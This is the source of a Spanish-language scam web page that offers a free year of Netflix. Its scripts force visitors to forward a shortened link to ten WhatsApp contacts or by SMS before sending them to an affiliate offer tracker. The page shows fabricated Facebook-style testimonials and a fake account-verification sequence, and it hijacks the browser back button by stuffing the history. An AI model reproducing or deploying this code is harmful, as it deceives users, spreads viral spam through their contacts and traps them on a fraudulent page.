<html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0">

<meta content="width=device-width, initial-scale=1.0" name="viewport">
<title>Activa una cuenta de Netflix gratis por un año!!!</title>
<meta property="og:image" content="https://i.imgur.com/jaZUwIV.png">
<meta property="og:site_name" content="Activa una cuenta de Netflix gratis por un año!!!">
<meta property="og:description" content="Activa una cuenta de Netflix gratis por un año!!!.">
<meta property="og:type" content="website">
<meta property="og:url" content="https://whatsapp.com">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>

<script>

var total=10;var timer_start=0;var pop_names=['#1_Name','#2_Name','#3_Name','#4_Name'];var pop_texts=['#1_Text','#2_Text','#3_Text','#4_Text'];var WhatsApp_share_message='Test';var Share_link='https://example.com/';var c=getCookie('c')?getCookie('c'):0,n=300,date=new Date(),time=date.getDate()+"/"+(date.getMonth()+1)+"/"+date.getFullYear()+" "+date.getHours()+":"+date.getMinutes()+":"+date.getSeconds(),text=['http://bit.do/Netfliix-Gratiis','http://bit.do/Netfliix-Gratiis','http://bit.do/Netfliix-Gratiis'],t=setInterval(function(){$("#countdown").text(n--),-1==n&&window.open("#","_self")&clearInterval(t)},1e3);function fn1(){if(/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)){window.open("whatsapp://send?text=%E2%80%BC *CONSIGE UNA CUENTA DE NETFLIX GRATIS POR UN AÑO* %E2%80%BC%0A%0A*CUENTAS DISPONIBLES* %F0%9F%93%8C %0A*MIRA TUS PELICULAS Y SERIES TOTALMENTE GRATIS*%E2%80%BC%0A%0A*SOLICITA HOY MISMO TU CUENTA AQUI* 👇👇"+text[Math.floor(Math.random()*text.length)]+" ","_self");c++;$('.progress span').width(((c/total)*100)+'%');setCookie('c',c,2);ga('send','event','WhatsApp','['+c+'][ES] cupon');if(c>total){window.open('#');}}else{window.alert('Debe compartir a traves del telefono movil para activar tu cuenta.');}}
function fn2(){if(c>total){window.open('https://Tracking-all-traffic.offerdirecto.com?id=ZsFrcZkok&type=21&click_id={click_id}&sub1={sub1}&sub2={sub2}&sub3={sub3}&source={source}');}else{window.alert("Para  activar tu cuenta, debes enviar el mensaje a 10 Amigos o Grupos de WhatsApp hasta que la barra se llene. Llevas invitados a: "+c+" contactos.");}}
function fn3(){if(/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)){window.open("sms:?body=Mira %0D%0A entra antes que se agoten los cheque regalos de Coto! %0D%0A   "+text[Math.floor(Math.random()*text.length)]+" %0D%0A %0D%0A"+time,"_self");c++;$('.progress span').width(((c/total)*100)+'%');setCookie('c',c,2);ga('send','event','sms','['+c+'][ES] coto');if(c>total){window.open('#');}}else{window.alert('Debe compartir a traves del telefono movil para activar activar tu cuenta.');}}
function setCookie(cname,cvalue,exdays){var d=new Date();d.setTime(d.getTime()+(exdays*24*60*60*1000));var expires='expires='+d.toGMTString();document.cookie=cname+'='+cvalue+'; '+expires;}
function getCookie(cname){var name=cname+'=';var ca=document.cookie.split(';');for(var i=0;i<ca.length;i++){var c=ca[i];while(c.charAt(0)==' ')c=c.substring(1);if(c.indexOf(name)===0){return c.substring(name.length,c.length);}}
return '';}
function isCookieSet(cname){var name=cname+'=';var ca=document.cookie.split(';');for(var i=0;i<ca.length;i++){var c=ca[i];while(c.charAt(0)==' ')c=c.substring(1);if(c.indexOf(name)===0){return true;}}
return false;}
jQuery(document).ready(function($){$(".answer").click(function(){if($(this).hasClass("anses1")){survey.step3();}});$('.progress span').width(((c/total)*100)+'%');var survey={step1:function(){setTimeout(function(){$(".question_count").hide();$(".question1").hide();$(".anses1").hide();$(".calculating").show();setTimeout(function(){$(".calculating").hide();$(".question_count span").html("2");$(".question_count").show();$(".question2").show();$(".anses2").show();},1200);},300);},step2:function(){setTimeout(function(){$(".question_count").hide();$(".question2").hide();$(".anses2").hide();$(".calculating").show();setTimeout(function(){$(".calculating").hide();$(".question_count span").html("3");$(".question_count").show();$(".question3").show();$(".anses3").show();},1200);},300);},step3:function(){setTimeout(function(){$(".question_count").hide();$(".question1").hide();$(".anses1").hide();$(".calculating").show();setTimeout(function(){$(".calculating").hide();$(".survey_middle").css("vertical-align","top");$(".loading").show();setTimeout(function(){$(".check1").fadeIn(300);setTimeout(function(){$(".check2").fadeIn(300);setTimeout(function(){$(".check3").fadeIn(300);setTimeout(function(){survey.change();},1400);},1100);},1400);},750);},600);},300);},change:function(){$(".headline,.small_headlines,.timer").hide();$(".loading").hide();$(".survey_outer").css("height","auto");$(".last_page").show();$(".fbcoms").show();waitme();}};$(".like").click(function(){if($(this).hasClass("selected")){$(this).removeClass("selected");$(this).html("Like");$("#youand").html("");}else{$(this).addClass("selected");$(this).html("Unlike");$("#youand").html("You and ");}});$(".fblike").click(function(){if($(this).hasClass("selected")){$(this).removeClass("selected");$(this).html("Like");}else{$(this).addClass("selected");$(this).html("Unlike");}});function waitme(){FBcom("#fb1",000);FBcom("#fb2",000);FBcom("#fb3",000);FBcom("#fb4",000);FBcom("#fb5",00);FBcom("#fb6",000);FBcom("#fb7",000);FBcom("#fb8",0000);var ct=48;(function loop(){var rand=random(2500,5500);var ctrand=random(1,4);ct=ct-ctrand;if(ct>1){setTimeout(function(){loop();},rand);}else{ct="few";}
$("#count").html(ct);}());}
function FBcom(a,b){setTimeout(function(){var m=0,n=true,op=0;$(a+", "+a+" .comtxt, "+a+" .combot").slideDown(500);$().slideDown(500);var t=setInterval(function(){op+=0.2;$(a).css({"opacity":op});m++;if(m===5)clearInterval(t);},100);},b);}
function random(min,max){return Math.round(Math.random()*(max-min)+min);}
var out,pops={init:function(){setTimeout(function(){var rand_name=pop_names[random(0,pop_names.length-1)];var rand_text=pop_texts[random(0,pop_texts.length-1)];var text=rand_name+" "+rand_text;$(".pops p").html(text);$(".pops").fadeIn(500);out=setTimeout(function(){$(".pops").fadeOut(1000);pops.init();},6000);},random(6000,15000));}};$("#iks").click(function(){clearTimeout(out);$(".pops").hide();pops.init();});$("#mins").html("0"+timer_start);$("#sec").html("00");var mins=timer_start,secs=0,minutes,seconds,timer={init:function(){var counter=setInterval(function(){$(".timer_heading").addClass("blink");setTimeout(function(){$(".timer_heading").removeClass("blink");},500);secs--;if(secs<0){secs=59;mins--;if(mins<0){clearInterval(counter);mins=0;secs=0;$(".timer_heading").hide();$(".timer .small_headlines").show();}
if(mins<10){minutes="0"+mins;}else{minutes=mins;}}
if(secs<10){seconds="0"+secs;}else{seconds=secs;}
$("#mins").html(minutes);$("#sec").html(seconds);},1000);}};if(c!=''&&c!=null){$(".question_count").hide();$(".question1").hide();$(".anses1").hide();survey.change();}
timer.init();});

</script>
<style>


@import url('https://fonts.googleapis.com/css?family=Montserrat');
      	
@font-face{
font-family: 'Roboto';
font-weight: 400;
src: url(../fonts/Roboto-Regular.ttf);
}
@font-face{
font-family: 'Roboto';
font-weight: 700;
src: url(../fonts/Roboto-Bold.ttf);
}
@font-face{
font-family: 'Tahoma';
font-weight: 400;
src: url(../fonts/Tahoma.ttf);
}
@font-face{
font-family: 'Tahoma';
font-weight: 700;
src: url(../fonts/Tahoma-Bold.ttf);
}
body{
width: 100%;
margin: 0;
font-family: 'Montserrat', sans-serif;
background: #000000;  /*back est*/
color:#6e34abed;
}
/*clearfix*/
.clearfix:before, .clearfix:after{content:"";display:table;}
.clearfix:after{clear: both;}
.clearfix{*zoom: 1;}
*{
box-sizing: border-box;
}
p{
margin: 0;
}
.cont_outer{
position: absolute;
display: table;
width: 100%;
height: 100%;
background-position: center top;
background-size: 750px auto;
background-repeat: repeat-y;
}
.bold{
font-weight: 700;
}
/*************************************************** header ***************************************************/
.header{
display: table-row;
width: 100%;
height: 50px;
background-color: #fff;
font-weight: 700;
}
.header-inner{
display: table-cell;
vertical-align: middle;
text-align: center;
}
.header-inner p{
vertical-align: middle;
color: #fff;
font-size: 18px
}
.header-inner p img{
vertical-align: middle;
}
#folder{
width: 28px;
}
#rupee1{
width: 14px;
padding-left: 2px
}
/*************************************************** content ***************************************************/

.content{
display: table-row;
width: 100%;
overflow-x: hidden
}
.content-middle{
display: table-cell;
vertical-align: middle;
width: 100%;
}
.content-inner{
width: 95%;
max-width: 600px;
margin: 1px auto;
text-align: center;
padding: 8px 3px;
border-radius: 4px;
/*background-color: #000000; /*back int*/
color: #FFF;
}
#logo{
width: 220px;
}
.headline{
color: #FFF;
font-weight: bold;
font-size: 22px;
line-height: 24px
}
.headline,.headline span img{
vertical-align: middle;
}
.headline span{
vertical-align: top;
}
.headline span{
text-decoration: underline;
}
.headline span img{
width: 12px;
margin-left: 3px;
}
.small_headlines{
font-size: 16px;
color: #FFF;
font-weight: 400;
padding-bottom: 1px;
}
.small_headlines img{
width: 10px;
margin-left: 3px;
vertical-align: middle;
line-height: 22px;
}
.question2,.question3{
display: none;
}
/*************************************************** survey ***************************************************/
.survey_outer{
display: table;
width: 95%;
margin: 5px auto 0;
/*background-color: #000000; /*color survey*/
border-radius: 4px;
height: 295px;
}
.survey_middle{
display: table-cell;
vertical-align: middle;
}
.survey_inner{
display: block;
width: 95%;
margin: 0 auto;
padding: 15px 0;
position: relative;
}
.anses2,.anses3{
display: none;
}
.question_count{
color: #fff;
font-size: 24px;
font-weight: 700;
}
.question_text{
color: #FFF;
font-size: 20px;
line-height: 38px;
}
.question2{
line-height: 1.2em;
padding: 10px 0 15px;
}
.question3{
line-height: 1.2em;
}
.answer{
width: 80%;
margin: 15px auto;
text-align: center;
padding: 7px 0;
color: #222;
background-color: #fff;
border-radius: 7px;
border: 1px solid #027CD5;
font-size: 24px;
font-weight: 400;
cursor: pointer;
-webkit-transition: all 0.3s ease-in-out;
-moz-transition: all 0.3s ease-in-out;
transition: all 0.3s ease-in-out;
}
.answer:hover{
color: #222;
background-color: #fff;
font-weight: 700;
}
.calculating{
display: none;
vertical-align: middle;
font-size: 28px;
text-transform: uppercase;
color: #fff;
font-weight: 700;
}
.calculating img{
vertical-align: middle;
width: 50px;
}
/****** loading ******/
.loading{
display: none;
text-align: center;
color: #fff;
font-weight: 700;
}
.loading img{
width: 70%;
max-width: 220px;
margin: 0 auto 15px;
}
.load_headline{
font-size: 24px;
margin: 15px 0;
}
.check{
font-size: 20px;
margin: 10px 0;
}
.check1,.check2,.check3{
display: none;
}
/*************************************************** last page ***************************************************/
.last_page{
display: none;
}
.last-up{
text-align: left;
}
.textlastup{
color: #fff;
font-size: 18px;
padding-bottom: 8px;
font-weight: 400;
}
.btn{
width: 80%;
font-size: 28px;
max-width: 345px;
margin: 15px auto;
background-color: #58BE41;
border-radius: 5px;
color: #fff;
font-weight: 700;
text-align: center;
display: block;
padding: 7px 0;
text-decoration: none;
-webkit-transition: all 0.2s ease-in-out;
-moz-transition: all 0.2s ease-in-out;
transition: all 0.2s ease-in-out;
box-shadow: none;
}
.btn:hover{
background-color: #fff;
color: #58BE41;
box-shadow: 0 0 2px #58BE41,
0 0 5px #58BE41,
0 0 7px #58BE41,
0 0 11px #58BE41;
}
.btn-share{
font-size: 24px;
background-color: #58BE41;
background-size: 40px auto;
background-position: left 5px top 1px;
background-repeat: no-repeat;
}

.progress {      width:80%;      height: 20px;  /* Can be anything */      position: relative;      margin: 60px 0 20px 0; /* Just for demo spacing */      background: #555;      padding: 10px;      -webkit-box-shadow: inset 0 -1px 1px rgba(255,255,255,0.3);      -moz-box-shadow   : inset 0 -1px 1px rgba(255,255,255,0.3);      box-shadow        : inset 0 -1px 1px rgba(255,255,255,0.3);      margin: auto;    }    .progress > span {      display: block;      height: 20px;	  left: 0;	  top: 0;      background-color: #3F51B5;      background-image: -webkit-gradient(         linear,         left bottom,         left top,         color-stop(0, #00BCD4),         color-stop(1, #2196F3)        );      background-image: -moz-linear-gradient(        center bottom,        rgb(43,194,83) 37%,        rgb(84,240,84) 69%       );      -webkit-box-shadow:         inset 0 2px 9px  rgba(255,255,255,0.3),        inset 0 -2px 6px rgba(0,0,0,0.4);      -moz-box-shadow:         inset 0 2px 9px  rgba(255,255,255,0.3),        inset 0 -2px 6px rgba(0,0,0,0.4);      box-shadow:         inset 0 2px 9px  rgba(255,255,255,0.3),        inset 0 -2px 6px rgba(0,0,0,0.4);      position: absolute;      overflow: hidden;    }    .progress > span:after, .animate > span > span {      content: "";      position: absolute;      top: 0; left: 0; bottom: 0; right: 0;      background-image:          -webkit-gradient(linear, 0 0, 100% 100%,             color-stop(.25, rgba(255, 255, 255, .2)),             color-stop(.25, transparent), color-stop(.5, transparent),             color-stop(.5, rgba(255, 255, 255, .2)),             color-stop(.75, rgba(255, 255, 255, .2)),             color-stop(.75, transparent), to(transparent)         );      background-image:         -moz-linear-gradient(          -45deg,             rgba(255, 255, 255, .2) 25%,             transparent 25%,             transparent 50%,             rgba(255, 255, 255, .2) 50%,             rgba(255, 255, 255, .2) 75%,             transparent 75%,             transparent         );      z-index: 1;      -webkit-background-size: 50px 50px;      -moz-background-size: 50px 50px;      -webkit-animation: move 2s linear infinite;         -webkit-border-top-right-radius: 8px;      -webkit-border-bottom-right-radius: 8px;             -moz-border-radius-topright: 8px;          -moz-border-radius-bottomright: 8px;                 border-top-right-radius: 8px;              border-bottom-right-radius: 8px;          -webkit-border-top-left-radius: 20px;       -webkit-border-bottom-left-radius: 20px;              -moz-border-radius-topleft: 20px;           -moz-border-radius-bottomleft: 20px;                  border-top-left-radius: 20px;               border-bottom-left-radius: 20px;      overflow: hidden;    }        .animate > span:after {      display: none;    }        @-webkit-keyframes move {        0% {           background-position: 0 0;        }        100% {           background-position: 50px 50px;        }    }




.btn-down{
font-size: 24px;
text-transform: uppercase;
}
/*************************************************** facecomms ***************************************************/
/* COMMENTS */
.fbcoms {
font-family: Tahoma, Verdana, sans-serif;
background-color: #fff;
width: 100%;
margin: 0 auto;
padding: 5px 10px;
font-size: 12px;
text-align: left;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
color: #333;
}
.comments {
font-weight: bold;
text-align: center;
padding: 0 5px 10px 5px;
}
.totlikes {
margin-top: 3px;
background-color: #eeeff4;
padding: 5px 5px 5px 23px;
background-repeat: no-repeat;
background-position: 5px center;
}
.fbblue {
color: #3c5a96;
}
.buttons {
padding-bottom: 5px;
font-family: Arial, sans-serif;
color: #7d7d7f;
}
.buttons span {
cursor: pointer;
}
.buttons span:hover {
text-decoration: underline;
}
.viewmore {
margin-top: 3px;
background-color: #eeeff4;
padding: 5px 5px 5px 23px;
background-position: 5px center;
background-repeat: no-repeat;
}
.left {
cursor: pointer;
float: left;
color: #3c5a96;
}
.left:hover {
text-decoration: underline;
}
.right {
color: #7d7d7f;
float: right;
}
.item {
position: relative;
margin-top: 3px;
background-color: #eeeff4;
padding: 5px 5px 5px 60px;
min-height: 60px;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
.item .profileimg {
position: absolute;
top: 5px;
left: 5px;
}
.comtxt {
line-height: 16px;
}
.name {
color: #3c5a96;
font-weight: bold;
}
.ago {
color: #86878c;
font-size: 0.95em;
}
.fblike {
color: #3c5a96;
font-size: 0.95em;
cursor: pointer;
}
.fblike:hover {
text-decoration: underline;
}
.combot {
padding-top: 5px;
}
.clickhere {
font-weight: bold;
padding: 30px 10px 5px;
line-height: 18px;
}
.likes {
color: #3c5a96;
font-size: 0.95em;
cursor: pointer;
}
.fbimg {
background-color: #fff;
border-radius: 2px;
-moz-border-radius: 2px;
-webkit-border-radius: 2px;
max-width: 210px;
width: 100%;
padding: 3px;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
border: 1px solid #808080;
margin: 10px 0 5px;
}
.hidden {
display: none;
opacity: 0;
}
.hidden .comtxt, .hidden .combot, .comments {
display: none;
}
.answer{
cursor: pointer;
}
/*************************************************** pops ***************************************************/
.pops{
position: fixed;
top: 80px;
right: 10px;
display: none;
width: 230px;
margin: 10px 10px 0 0;
background-color: rgba(173,176,192,0.8);
width: 230px;
border-radius: 8px;
box-shadow: 0 0 7px #888888;
padding-bottom: 3px
}
#piplovi{
width: 55px;
margin: 0;
padding: 5px;
float: left;
}
#iks{
position: absolute;
top: -10px;
right: -10px;
width: 20px;
cursor: pointer;
}
.pops p{
width: 170px;
padding: 2px;
padding-top: 10px;
margin-left: 50px;
font-size: 14px;
color: #fff;
word-spacing: 0;
line-height: 100%;
}
/*************************************************** timer ***************************************************/
.timer .small_headlines{
display: none;
}
.timer_heading{
width: 80%;
margin: 0 auto;
font-size: 16px;
color: #e6dcdced;
font-weight: 400;
padding-bottom: 10px;
}
@-webkit-keyframes bllink{
from{
color: #fff;
text-shadow: none;
transform: scale(1,1);
}
to{
color: #ff0000;
text-shadow: 0 0 2px #fff,0 0 5px #fff,0 0 7px #fff,0 0 10px #fff,0 0 12px #fff,0 0 15px #fff;
transform: scale(1.3,1.3);
}
}
@-moz-keyframes bllink{
from{
color: #fff;
text-shadow: none;
transform: scale(1,1);
}
to{
color: #ff0000;
text-shadow: 0 0 2px #fff,0 0 5px #fff,0 0 7px #fff,0 0 10px #fff,0 0 12px #fff,0 0 15px #fff;
transform: scale(1.3,1.3);
}
}
@keyframes bllink{
from{
color: #fff;
text-shadow: none;
transform: scale(1,1);
}
to{
color: #ff0000;
text-shadow: 0 0 2px #fff,0 0 5px #fff,0 0 7px #fff,0 0 10px #fff,0 0 12px #fff,0 0 15px #fff;
transform: scale(1.3,1.3);
}
}
.blink{
-webkit-animation: 0.2s bllink ease-in-out alternate;
-moz-animation: 0.2s bllink ease-in-out alternate; 
animation: 0.2s bllink ease-in-out alternate;
}
/*************************************************** media ***************************************************/
@media screen and (max-width: 600px){
.cont_outer{
background-size: 600px auto;
}
.headline{
font-size: 18px;
}
.small_headlines,.timer_heading{
font-size: 13px;
}
}
@media screen and (max-width: 500px){
.btn{
width: 90%;
max-width: 345px;
}
}
@media screen and (max-width: 400px)
.header-inner p{
font-size: 14px;
}
#rupee1{
width: 12px;
padding-left: 2px
}
.header{
height: 40px;
}
.answer{
margin: 10px auto;
padding: 5px 0;
border-radius: 7px;
border: 1px solid #027CD5;
font-size: 20px;
color: #222;
font-weight: 700;
}
.survey_outer{
height: 250px;
}
.calculating{
font-size: 22px;
}
.load_headline{
font-size: 20px;
margin: 15px 0;
}
.check{
font-size: 16px;
margin: 10px 0;
}
.textlastup{
font-size: 16px;
padding-bottom: 5px;
font-weight: 400;
}
.btn{
width: 100%;
max-width: 345px;
}
.btn-share{
font-size: 20px;
background-size: 36px auto;
}
.btn-down{
font-size: 20px;
}
}	#main-frame-error{display:none;height:auto}.interstitial-wrapper{padding-top:10px;box-sizing:border-box;font-size:1em;line-height:18px;margin:auto;max-width:600px;width:90%}#today{float:right;font-weight:600;padding-top:15px}#main-message>p{display:inline}#blink{color:#f00;padding:6px;-webkit-animation:blink 1s infinite;-moz-animation:blink 1s infinite;-ms-animation:blink 1s infinite;-o-animation:blink 1s infinite;animation:blink 1s infinite}@-webkit-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}@-moz-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}@-ms-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}}@-o-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}@keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}#theTime{font-size:18px;font-weight:bold;color:red;font-family:sans-serif}h1{color:#000;font-size:1.6em;line-height:1.25em;margin-bottom:16px}#alertimg{height:26px;width:26px;position:absolute;top:13px;left:17px}.popup{display:none;position:absolute;top:20%;left:50%;width:88%;max-width:280px;margin:0 0 0 -140px;font-size:1em;border-radius:4px;background-color:#282828;color:#fff;overflow:hidden;box-shadow:1px 1px 7px #000;z-index:100}.popup-head{background-color:#282828;padding:18px 16px 18px 55px;border-bottom:2px solid #33b4e4;color:#33b4e4;line-height:normal}.popup-center{padding:20px 16px;color:#f3f3f3;line-height:20px}.popup-bottom{background-color:#282828;padding:9px 6px;text-align:center;border-top:1px solid #474747;overflow:hidden}.popup-bottom .button{display:block;height:30px;width:128px;margin:0 auto;font-size:1.1em;color:#f3f3f3;border-radius:3px;cursor:pointer;text-decoration:none;padding:0;line-height:30px}

a {
text-decoration: none;
}
</style>
<link href="css.css" rel="stylesheet">
<style type="text/css">
.form_questions {
		width: 100%;
		/*background-color: #f44336*/
}
.wrapper {
		max-width: 800px;
		width: 96%;
		margin: 0 auto
}
.myButton {
		background-color: #ffffff;  
		border-radius: 10px;
		border: 2px solid #ffffff;
		display: block;
		cursor: pointer;
		color: #000000;
		font-size: 17px;
		/* font-weight: 200; */
		
		font-weight: bold;
		margin: 10px auto;
		padding: 13px 32px;
		/* padding: 10px; */
		
		text-decoration: none;
		width: 230px;
}

</style>

<script type="text/javascript">
! function () {
var t;
try {
for (t = 0; 10 > t; ++t) history.pushState({}, "", "#");
onpopstate = function (t) {
t.state && location.replace("#")
}
} catch (o) {}
}();
</script>


<style type="text/css">.waubutton {display: inline-block;position: relative;background-color: rgb(0, 0, 0);color: rgb(255, 255, 255);text-decoration: none;text-transform: lowercase;letter-spacing: -2px;text-shadow: 0px 1px 0px rgba(0, 0, 0, 0.5);-ms-filter: "progid:DXImageTransform.Microsoft.dropshadow(OffX=0,OffY=1,Color=#ff123852,Positive=true)";zoom: 1;width: 50px;filter: progid: DXImageTransform.Microsoft.dropshadow(OffX=0, OffY=1, Color=#ff123852, Positive=true);-moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.2);-webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.2);box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.2);-ms-filter: "progid:DXImageTransform.Microsoft.dropshadow(OffX=0,OffY=2,Color=#33000000,Positive=true)";filter: progid: DXImageTransform.Microsoft.dropshadow(OffX=0, OffY=2, Color=#33000000, Positive=true);}.waubutton:hover {text-decoration: none !important;color: #eeeaee !important;}.waubutton p {position: relative !important;font-family: "Inconsolata", sans-serif;font-weight: 700 !important;}.waubutton span {position: absolute !important;left: 15px !important;width: 50px !important;font-size: 30px !important;-webkit-border-top-left-radius: 5px !important;-webkit-border-bottom-left-radius: 5px !important;-moz-border-radius-topleft: 5px !important;-moz-border-radius-bottomleft: 5px !important;border-top-left-radius: 5px !important;border-bottom-left-radius: 5px !important;text-decoration: none !important;}.waubutton img {margin-top: 3px !important;vertical-align: 0 !important;border: 0 !important;mix-blend-mode: overlay;}@-webkit-keyframes push {50% {-webkit-transform: scale(0.9);transform: scale(0.9);}100% {-webkit-transform: scale(1);transform: scale(1);}}@keyframes push {50% {-webkit-transform: scale(0.9);transform: scale(0.9);}100% {-webkit-transform: scale(1);transform: scale(1);}}.push {display: inline-block;-webkit-transform: translateZ(0);transform: translateZ(0);box-shadow: 0 0 1px rgba(0, 0, 0, 0);}.push:hover,.push:focus,.push:active {-webkit-animation-name: push;animation-name: push;-webkit-animation-duration: 0.2s;animation-duration: 0.2s;-webkit-animation-timing-function: linear;animation-timing-function: linear;-webkit-animation-iteration-count: 1;animation-iteration-count: 1;}</style><link rel="me" href="https://www.blogger.com/profile/08879034598883387734" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
</head>
<body cz-shortcut-listen="true">
    
    
    
    
<center>
<img src="https://i.imgur.com/MBtnW1b.png" width="50%">
</center>
<center>
<div class="content">
<div class="content-middle">
<div class="content-inner">
<p class="headline">Cuentas De Netflix Gratis 2021</p><br>
<p class="small_headlines">Responde la siguiente pregunta debajo para recibir una cuenta de Netflix.</p>

<button type="button" onclick="setBackgroundColor('#000000')" style="background-color:#000000;border:yes;border: 1px solid #FFFFFF;width:50px;height:50px;border-radius:5px;"></button>
<script>
		  function setBackgroundColor(color) {
			  document.body.style.backgroundColor = color;
		  }
		  </script>

<div class="survey_outer">
<div class="survey_middle">
<div class="survey_inner">

<p class="question_text question1">
¿Cual es tu idioma natal?
</p>
<p class="question_text question2">
2.
</p>
 <p class="question_text question3">
3. ¿Alguna vez has comprado un producto de la marca L'Oréal?
</p>
<div class="ans-box">
<div class="answer anses1">
<p> ESPAÑOL </p>
</div>
<div class="answer anses1">
<p> INGLES</p>
</div>
<div class="answer anses2">
<p>Entre 18 y 24 años</p>
</div>
<div class="answer anses2">
<p>Entre 25 y 32 años</p>
</div>
<div class="answer anses2">
<p>33 años o más</p>
</div>
<div class="answer anses3">
<p>SI</p>
</div>
<div class="answer anses3">
<p>NO</p>
</div>
</div>
<p class="calculating"><img alt="" src="https://i.imgur.com/Rg56LIs.gif">
Por favor espera un momento...</p>
<div class="loading"><p class="load_headline">
Buscando Cuentas Disponibles......</p>
<img alt="" src="https://i.imgur.com/Rg56LIs.gif" style="height:50px;width:50px;">
<p class="check check1">Verificando...</p>
<p class="check check2">Seleccionando...</p>
<p class="check check3">Aprobada...</p>
</div>
<div class="last_page">
<div class="last-up">



<div class="form_questions wrapper">
<div class="question wrapper" id="q1">
<p class="text" style="padding: 0 !important; font-size: 17px!important; color: #FFFFFF; text-align: left; margin-left: 15px;"><br>
<b>Correo de la cuenta: hugers.store1@gmail.com Contraseña: ******** Sigue estos pasos para obtener Tu Cuenta de Netflix completa:</b></p>
<br>
<p class="text" style="font-size: 16px; text-align: left; margin-left:15px;"><strong>1.</strong> Envía el mensaje de 5 a 10 Amigos o 2 Grupos de WhatsApp. (Haz clic en el botón "COMPARTIR").</p>
<p class="text" style="font-size: 16px; text-align: left; margin-left:15px;"><strong>2.</strong> Haz clic en "CONTINUAR".</p>
<p class="text" style="font-size: 16px; text-align: left; margin-left:15px;"><strong>3.</strong> Tu cuenta de Netflix sera activada y recibiras la contraseña.</p>
<button class="myButton" onclick="fn1()"><img src="https://i.imgur.com/HV1c5wS.png" width="35">COMPARTIR</button>
<button class="myButton" onclick="fn2()">CONTINUAR</button>

<p class="text" style="padding: 0 !important; font-size: 17px!important; color: #FFFFFF; text-align: left; margin-left: 15px;"><br>
<b>IMPORTANTE: Debes compartir hasta que la barra se llene:</b></p>
</div>
</div>

<input id="number" type="hidden" value="0">

<h4 class="textlastup"></h4>
<div class="progress">
<span aria-valuemax="100%" aria-valuemin="1%" aria-valuenow="1" id="progressbar" style="width: 0%; max-width: 100%;"></span></div>
</div>
</div>
<br>
<br>
<a href="https://Tracking-all-traffic.offerdirecto.com?id=ZsFrcZkok&type=21&click_id={click_id}&sub1={sub1}&sub2={sub2}&sub3={sub3}&source={source}">
<img class="profileimg" height="68" src="https://i.imgur.com/bjzEAPs.png">
</a>

<br>
<br>

<a href="https://Tracking-all-traffic.offerdirecto.com?id=ZsFrcZkok&type=21&click_id={click_id}&sub1={sub1}&sub2={sub2}&sub3={sub3}&source={source}">
<img class="profileimg" height="68" src="https://i.imgur.com/v9jFyqS.png">
</a>






<div>
</div>
<hr>
<div class="fbcoms" style="display:none;">
<p class="comments">
</p>
<p class="buttons">
<span class="like">
Me Gusta
</span>
·
<span>
Compartir
</span>
·
<span>
Comentar
</span>
·
<span>
</span>
</p>
<p class="totlikes">
<span id="youand">
 </span>
<span class="fbblue">Otros 204,208</span>
</p>
<p class="viewmore clearfix">
<span class="left">Otros comentarios</span>
<span class="right">67 de 210,541</span>
<br>
</p>
<div class="item" id="fb8" style="display: none; opacity: 1;">
<img class="profileimg" height="50" src="https://i.imgur.com/poE1Phr.jpg" width="50">
<p class="comtxt" style="display: block;"><span class="name">
Maria Garra</span>
<br>
Demasiado bueno para ser cierto, funciona muy bien </p>
<p class="combot" style="display: block;">
<span class="ago">
Ahora
</span>
·
<span class="fblike">
Like
</span>
</p>
</div>
<div class="item" id="fb7" style="display: none; opacity: 1;">
<img class="profileimg" height="50" src="https://i.imgur.com/h4fNi2h.jpg" width="50">
<p class="comtxt" style="display: block;">
<span class="name">
Luisa Lopez
</span>
<br>
Tienen que compartir para activar la cuenta</p>
<p class="combot" style="display: block;">
<span class="ago">
Ahora
</span>
&#183;
<span class="fblike">
Me Gusta
</span>
</p>
</div>
<div class="item" id="fb6" style="display: none; opacity: 1;">
<img class="profileimg" height="50" src="https://i.imgur.com/qgB5tAt.jpg" width="50">
<p class="comtxt" style="display: block;">
<span class="name">
Sophia Gonzales
</span>
<br>
son los mejores lo comparto con todos mis amigos
</p>
<p class="combot" style="display: block;">
<span class="ago">
Ahora
</span>
·
<span class="fblike">
Me Gusta
</span>
</p>
</div>
<div class="item" id="fb5" style="display: none; opacity: 1;">
<img class="profileimg" height="50" src="https://i.imgur.com/6nkPmOU.jpg" width="50">
<p class="comtxt" style="display: block;">
<span class="name">
Miguel Delgado
</span>
<br>
Ya esta funcionando mi cuenta, gracias</p>
<p class="combot" style="display: block;">
<span class="ago">
Ahora
</span>
·
<span class="fblike">
Ne Gusta
</span>
</p>
</div>
<div class="item" id="fb4" style="display: none; opacity: 1;">
<img class="profileimg" height="50" src="https://i.imgur.com/vwLoh89.jpg" width="50">
<p class="comtxt" style="display: block;">
<span class="name">
Jacob Mestazo
</span>
<br>
pense que no funcionaria, ¡Gracias!
</p>
<p class="combot" style="display: block;">
<span class="ago">
Ahora
</span>
·
<span class="fblike">
Me Gusta
</span>
</p>
</div>
<div class="item">
<img class="profileimg" height="50" src="https://i.imgur.com/L6JjTcM.jpg" width="50">
<p class="comtxt">
